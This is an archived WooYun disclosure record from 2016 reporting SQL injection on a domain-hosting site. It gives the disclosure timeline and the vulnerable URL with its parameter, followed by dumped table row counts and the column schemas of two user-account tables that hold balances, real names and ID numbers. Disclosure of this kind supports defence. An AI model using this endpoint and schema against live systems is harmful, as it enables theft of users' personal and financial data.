WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
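2016-01-11: Details reported to the vendor; awaiting vendor response
2016-01-12: Vendor confirmed; details disclosed to the vendor only
2016-01-22: Details disclosed to core white hats and experts in related fields
2016-02-01: Details disclosed to regular white hats
2016-02-11: Details disclosed to intern white hats
2016-02-22: Details disclosed to the public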
SQL injection
Vulnerable URL: http://59.cn/service/serLogin/w_service_chkLogin.asp?action=chklogin&auser=1
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.userlogin_log       | 1861273 |
| dbo.A_User_Account      | 1470922 |
| dbo.x59_Account         | 1083543 |
| dbo.integral            | 489171  |
| dbo.points              | 489171  |
| dbo.A_Indent_Domain     | 357630  |
| dbo.adminop_log         | 269537  |
| dbo.A_User_Main         | 92310   |
| dbo.A_User_Level_Price  | 91845   |
| dbo.A_FAQ               | 87660   |
| dbo.Area_View           | 79624   |
| dbo.ProductRemind       | 66018   |
| dbo.B_IPay              | 45804   |
| dbo.A_Domain_ConTact    | 26471   |
| dbo.x59_RegDomain_Log   | 19772   |
| dbo.A_Indent_Host       | 18476   |
| dbo.A_API_UserRecord    | 16907   |
| dbo.tbl_UserAccount     | 12647   |
| dbo.Admin_Log           | 10638   |
| dbo.A_Indent_VPS        | 10628   |
| dbo.w_CheckDomainList   | 9049    |
| dbo.cre_tmp_all         | 7722    |
| dbo.x59_RenDomain_Log   | 7627    |
| dbo.user_log            | 7612    |
| dbo.A_WebHost           | 4938    |
| dbo.A_domain_template   | 3985    |
| dbo.B_CorpMail          | 2799    |
| dbo.aa                  | 2797    |
| dbo.A_Indent_SQL        | 2640    |
| dbo.A_Web_Whois         | 2292    |
| dbo.A_Indent_Plat       | 2189    |
| dbo.qk_customer         | 1279    |
| dbo.Agent_sys_config    | 1206    |
| dbo.A_Web_ShopCart      | 1159    |
| dbo.A_Product_Main      | 831     |
| dbo.DomainRemind        | 707     |
| dbo.ShopOrder           | 617     |
| dbo.UserPaFa            | 534     |
| dbo.B_News              | 400     |
| dbo.B_Domain_Contacts   | 384     |
| dbo.HostEfangStopList   | 300     |
| dbo.B_Country           | 239     |
| dbo.ProCard             | 206     |
| dbo.COR_Tmp             | 187     |
| dbo.Agent_FAQ           | 176     |
| dbo.B_AppPool           | 166     |
| dbo.changeHost          | 100     |
| dbo.A_Indent_Email      | 75      |
| dbo.SelectIP            | 64      |
| dbo.Agent_Adv           | 61      |
| dbo.UserPaFaMemo        | 60      |
| dbo.cre_tmp_id_bak      | 43      |
| dbo.A_ICP_Type          | 37      |
| dbo.A_ICP_News          | 29      |
| dbo.nok                 | 29      |
| dbo.Administrator       | 26      |
| dbo.qk_codeMap          | 26      |
| dbo.opr_log             | 22      |
| dbo.A_Indent_DNS        | 18      |
| dbo.B_Log_Delete        | 18      |
| dbo.RemindContent       | 18      |
| dbo.w_CheckTotalAccount | 16      |
| dbo.partner59_info      | 15      |
| dbo.w_CheckDomList      | 14      |
| dbo.A_Indent_API        | 13      |
| dbo.qk_ip               | 12      |
| dbo.W_FAQ               | 7       |
| dbo.knot_log            | 6       |
| dbo.qk_agent            | 4       |
| dbo.A_Indent_Search     | 3       |
| dbo.ICPAccout           | 3       |
| dbo.messages            | 3       |
| dbo.cre_tmp_id          | 2       |
| dbo.x59_Domain_Expied   | 2       |
| dbo.B_Credence_Count    | 1       |
+-------------------------+---------+

Database: vcp
Table: dbo.A_User_Account
[25 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| aa             | decimal  |
| balance        | money    |
| bankDate       | datetime |
| buynum         | tinyint  |
| CheckTime      | datetime |
| Credence       | nvarchar |
| DoDate         | datetime |
| estate         | nvarchar |
| Extend         | nvarchar |
| Handle         | nvarchar |
| id             | bigint   |
| isknot         | char     |
| MoneyDate      | datetime |
| MoneyPayFor    | nvarchar |
| MoneyWay       | nvarchar |
| ParentID       | nvarchar |
| parentPartner  | varchar  |
| PartnerProfits | money    |
| remark2        | varchar  |
| source         | varchar  |
| TrueId         | varchar  |
| TrueName       | nvarchar |
| txtPartner     | varchar  |
| UserID         | nvarchar |
| wise           | nvarchar |
+----------------+----------+

Database: vcp
Table: dbo.x59_Account
[25 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| aa             | decimal  |
| balance        | money    |
| bankDate       | datetime |
| buynum         | tinyint  |
| CheckTime      | datetime |
| Credence       | nvarchar |
| DoDate         | datetime |
| estate         | nvarchar |
| Extend         | nvarchar |
| Handle         | nvarchar |
| id             | bigint   |
| isknot         | char     |
| MoneyDate      | datetime |
| MoneyPayFor    | nvarchar |
| MoneyWay       | nvarchar |
| ParentID       | nvarchar |
| parentPartner  | varchar  |
| PartnerProfits | money    |
| remark2        | varchar  |
| source         | varchar  |
| TrueId         | varchar  |
| TrueName       | nvarchar |
| txtPartner     | varchar  |
| UserID         | nvarchar |
| wise           | nvarchar |
+----------------+----------+
dd
Severity: High
Vulnerability Rank: 18
Confirmed: 2016-01-12 11:59
Thanks for the report
None yet